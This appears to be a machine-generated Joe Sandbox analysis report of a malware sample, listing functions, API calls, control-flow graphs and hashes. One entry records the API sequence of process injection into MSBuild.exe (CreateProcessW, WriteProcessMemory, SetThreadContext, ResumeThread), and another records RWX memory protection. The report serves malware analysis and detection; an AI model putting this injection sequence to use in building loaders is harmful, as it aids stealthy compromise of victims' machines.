                                                                                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                    • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                    • Instruction ID: abe5277de1567abf88329a28139c8a762e5aaf0074acbbf23cc94a9b37ef3c19
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91B1187664064AAFDB60CF68CC80BDA73A5FF88714F158525EA0CAB341D774FA42CB94
                                                                                                                                                                                                                                                    Function 00461614 Relevance: 9.2, APIs: 6, Instructions: 171fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00461098: _strlen.LIBCMT ref: 004610F9
                                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE ref: 00461675
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00461685
                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 004616AB
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004616BA
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00461705
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00461805
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2911764282-0
                                                                                                                                                                                                                                                    • Opcode ID: fe8b5a13210201686a64f6cd6ad9c08efc9a0c934baafe738f03e4e6442a7ff9
                                                                                                                                                                                                                                                    • Instruction ID: 6ac85898b1e16079b31cceb6a5cbdea28fd3dfbca10cdb21bc832e85cd7fc0f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8b5a13210201686a64f6cd6ad9c08efc9a0c934baafe738f03e4e6442a7ff9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551F0B19043419BD700AF25DC84B2FB7E4BF95308F19492EF48997361F738A9448B9B
                                                                                                                                                                                                                                                    Function 0046155C Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00461098: _strlen.LIBCMT ref: 004610F9
                                                                                                                                                                                                                                                    • FreeConsole.KERNELBASE ref: 0046158B
                                                                                                                                                                                                                                                      • Part of subcall function 0046123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 004612C7
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00485011,00000549,00000040,?), ref: 004615D7
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0046160E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2898289550-0
                                                                                                                                                                                                                                                    • Opcode ID: 71bed5ff3db665cb6f8bdbe49c1e679d3639ee6e6e388a361e05c0f4b6381501
                                                                                                                                                                                                                                                    • Instruction ID: 56ebeb0533800202979ea51abe47935763eb75c19c27b8ab398f45532ac0314c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71bed5ff3db665cb6f8bdbe49c1e679d3639ee6e6e388a361e05c0f4b6381501
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B711E7B1A001086BEB00BF659C52BBF7768EF85704F54483AF508B7291F6795D014BEA
                                                                                                                                                                                                                                                    Function 0046123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 94 46123b-461261 95 461263-46127c 94->95 95->95 96 46127e-461280 95->96 97 461282-4612ac 96->97 97->97 98 4612ae-4612b6 97->98 99 461355-46136d call 4629c6 98->99 100 4612bc-4612c0 98->100 101 4612c2-4612df KiUserExceptionDispatcher 100->101 103 4612e1-4612eb call 46136e 101->103 104 4612fc-46134f 101->104 107 4612f0-4612f9 call 461533 103->107 104->99 104->101 107->104
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 004612C7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                    • String ID: [+]
                                                                                                                                                                                                                                                    • API String ID: 6842923-4228040803
                                                                                                                                                                                                                                                    • Opcode ID: bd6439590a2f36bd6566527b973e3c0d66ac2cfc438b312e82b1bb6d1ece5009
                                                                                                                                                                                                                                                    • Instruction ID: eae530dd66d4b65f87157777a819a6c491136e0542de19bdf5fdec011b847bf8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6439590a2f36bd6566527b973e3c0d66ac2cfc438b312e82b1bb6d1ece5009
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6731F77160C3804FD716AB35A8997EBBBD0ABBD318F1C097ED8CA87243D1655449CB63
                                                                                                                                                                                                                                                    Function 00475283 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 110 475283-4752a5 111 4752ab-4752ad 110->111 112 475498 110->112 114 4752af-4752ce call 46b601 111->114 115 4752d9-4752fc 111->115 113 47549a-47549e 112->113 123 4752d1-4752d4 114->123 116 475302-475308 115->116 117 4752fe-475300 115->117 116->114 119 47530a-47531b 116->119 117->116 117->119 121 47532e-47533e call 4755b0 119->121 122 47531d-47532b call 474033 119->122 128 475387-475399 121->128 129 475340-475346 121->129 122->121 123->113 130 4753f0-475410 WriteFile 128->130 131 47539b-4753a1 128->131 132 47536f-475385 call 47562d 129->132 133 475348-47534b 129->133 134 475412-475418 GetLastError 130->134 135 47541b 130->135 137 4753a3-4753a6 131->137 138 4753dc-4753e9 call 475a5c 131->138 148 475368-47536a 132->148 139 475356-475365 call 4759f4 133->139 140 47534d-475350 133->140 134->135 142 47541e-475429 135->142 143 4753c8-4753da call 475c20 137->143 144 4753a8-4753ab 137->144 155 4753ee 138->155 139->148 140->139 145 475430-475433 140->145 149 475493-475496 142->149 150 47542b-47542e 142->150 156 4753c3-4753c6 143->156 151 475436-475438 144->151 152 4753b1-4753be call 475b37 144->152 145->151 148->142 149->113 150->145 157 475466-475472 151->157 158 47543a-47543f 151->158 152->156 155->156 156->148 163 475474-47547a 157->163 164 47547c-47548e 157->164 161 475441-475453 158->161 162 475458-475461 call 46adf9 158->162 161->123 162->123 163->112 163->164 164->123
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0047562D: GetConsoleOutputCP.KERNEL32(453CBA4A,00000000,00000000,?), ref: 00475690
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0046BBF3,?), ref: 00475408
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0046BBF3,?,0046BE37,00000000,?,00000000,0046BE37,?,?,?,00484628,0000002C,0046BD23,?), ref: 00475412
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2915228174-0
                                                                                                                                                                                                                                                    • Opcode ID: c449a82176712b431fb9e98fed28c621129ba72da56edc2e092cbbccbeec0b11
                                                                                                                                                                                                                                                    • Instruction ID: 17477dde23ee902e30c73bdb61c47626bd7d3c9cf421d29f01a701cd5ce322bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c449a82176712b431fb9e98fed28c621129ba72da56edc2e092cbbccbeec0b11
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A61D671D00519AFDF11CFA8C844AEFBBB9AF09304F14815AE908AB252D3B9D941CB69
                                                                                                                                                                                                                                                    Function 00475A5C Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 167 475a5c-475ab1 call 4656e0 170 475b26-475b36 call 4629c6 167->170 171 475ab3 167->171 172 475ab9 171->172 174 475abf-475ac1 172->174 176 475ac3-475ac8 174->176 177 475adb-475b00 WriteFile 174->177 178 475ad1-475ad9 176->178 179 475aca-475ad0 176->179 180 475b02-475b0d 177->180 181 475b1e-475b24 GetLastError 177->181 178->174 178->177 179->178 180->170 182 475b0f-475b1a 180->182 181->170 182->172 183 475b1c 182->183 183->170
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,004753EE,00000000,0046BE37,?,00000000,?,00000000), ref: 00475AF8
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,004753EE,00000000,0046BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0046BBF3), ref: 00475B1E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                                                                                                                    • Opcode ID: 66d114d10cb9c8a9bad720cd422331db2e176594e8eb9574e9344df891c1b4cf
                                                                                                                                                                                                                                                    • Instruction ID: e79c491244cb1c49549538753ed6bc514566b0ed86bcfdd2fc5b548a5dd6a362
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66d114d10cb9c8a9bad720cd422331db2e176594e8eb9574e9344df891c1b4cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0321B430A002199FCB15CF29DD809EDB7B9EF4D301F1481AEE90ADB211D670EE42CB69
                                                                                                                                                                                                                                                    Function 0046FF89 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 184 46ff89-46ff8e 185 46ff90-46ffa8 184->185 186 46ffb6-46ffbf 185->186 187 46ffaa-46ffae 185->187 189 46ffd1 186->189 190 46ffc1-46ffc4 186->190 187->186 188 46ffb0-46ffb4 187->188 191 47002b-47002f 188->191 194 46ffd3-46ffe0 GetStdHandle 189->194 192 46ffc6-46ffcb 190->192 193 46ffcd-46ffcf 190->193 191->185 195 470035-470038 191->195 192->194 193->194 196 46ffe2-46ffe4 194->196 197 47000d-47001f 194->197 196->197 199 46ffe6-46ffef GetFileType 196->199 197->191 198 470021-470024 197->198 198->191 199->197 200 46fff1-46fffa 199->200 201 470002-470005 200->201 202 46fffc-470000 200->202 201->191 203 470007-47000b 201->203 202->191 203->191
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0046FE78,00484948), ref: 0046FFD5
                                                                                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0046FE78,00484948), ref: 0046FFE7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                                                                                                    • Opcode ID: f69783d62068a94773f0f4806178ac70e3066b1109851ccd3105caff2fa21932
                                                                                                                                                                                                                                                    • Instruction ID: 36f96d4af615869153b017eb7134c9979c959d20a3ddd2a0f5f499990d8cdf08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f69783d62068a94773f0f4806178ac70e3066b1109851ccd3105caff2fa21932
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911E4711047818AC7344E3DAC88767BA94A757334F380B2FD1BA826F1D238D986C24A
                                                                                                                                                                                                                                                    Function 0046136E Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 204 46136e-4613b1 call 46ce80 call 46197e 209 4613b7-4613fa 204->209 210 4614c9-4614ce 204->210 212 46144e-461463 call 46408b 209->212 213 4613fc-461404 209->213 211 4614f0-461532 call 461ab6 call 461a10 call 4629c6 210->211 218 461466-46147b 212->218 213->212 215 461406-461409 213->215 216 46140d-461425 call 4619d8 215->216 227 4614d0-4614d5 216->227 228 46142b-461442 216->228 221 4614c0-4614c7 218->221 222 46147d-461485 218->222 226 4614e0-4614ec 221->226 222->221 225 461487-461489 222->225 230 46148a-4614a5 call 4619d8 225->230 226->211 227->226 228->216 231 461444-46144c 228->231 235 4614d7-4614dc 230->235 236 4614a7-4614be 230->236 231->212 235->226 236->221 236->230
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                                                                                                    • Opcode ID: 7f3b8c1aafad3f35bb3301e95bb5ade756897916e2ff5cd735c141d4d86b48fd
                                                                                                                                                                                                                                                    • Instruction ID: 8f5d55b120e7ce8924e29552672c1e95e745ad1fcce7b9926c17f003ac36df18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f3b8c1aafad3f35bb3301e95bb5ade756897916e2ff5cd735c141d4d86b48fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7651A3713042048FC714DF6DC990B6A77D1EF88318F19866DE959CB3A2EA34ED05CB46
                                                                                                                                                                                                                                                    Function 00463C29 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 238 463c29-463c43 239 463c45-463c47 238->239 240 463c4c-463c54 238->240 243 463d25-463d32 call 4629c6 239->243 241 463c56-463c60 240->241 242 463c75-463c79 240->242 241->242 248 463c62-463c73 241->248 245 463d21 242->245 246 463c7f-463c90 call 4644b9 242->246 250 463d24 245->250 254 463c92-463c96 246->254 255 463c98-463ccc 246->255 252 463cee-463cf0 248->252 250->243 252->250 256 463cdf call 4635da 254->256 261 463cf2-463cfa 255->261 262 463cce-463cd1 255->262 260 463ce4-463ceb 256->260 260->252 263 463d0f-463d1f 261->263 264 463cfc-463d0d call 46c578 261->264 262->261 265 463cd3-463cd7 262->265 263->250 264->245 264->263 265->245 267 463cd9-463cdc 265->267 267->256
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e863cdbc7d0ad24767591138cafc305c791baac917a1afbdfde5f8ff47980e28
                                                                                                                                                                                                                                                    • Instruction ID: 5ca9251fd733dadcea68fce0329142b3ba36882a6e1eeb4f6bd1876e1efb30d2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e863cdbc7d0ad24767591138cafc305c791baac917a1afbdfde5f8ff47980e28
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031847290015AAFCF14CF68D8908EEB7F9BF09325F14422BE512E3290E735EA44CB55
                                                                                                                                                                                                                                                    Function 00463C1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 269 463c1b-463c20 270 463c22-463c28 call 468773 269->270 271 463c6e-463c74 269->271 272 463c76 271->272 273 463bf9-463c08 271->273 275 463cc4-463ccc 272->275 276 463c78-463c80 272->276 279 463cf2-463cfa 275->279 280 463cce-463cd1 275->280 281 463d0f-463d1f 279->281 282 463cfc-463d0d call 46c578 279->282 280->279 283 463cd3-463cd7 280->283 285 463d24-463d32 call 4629c6 281->285 282->281 286 463d21 282->286 283->286 287 463cd9-463cdf call 4635da 283->287 286->285 294 463ce4-463cf0 287->294 294->285
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3988221542-0
                                                                                                                                                                                                                                                    • Opcode ID: 2cf806aed82742a97ead72a81b410df2b1d345fe2c2114ae3e5f2f4abda08105
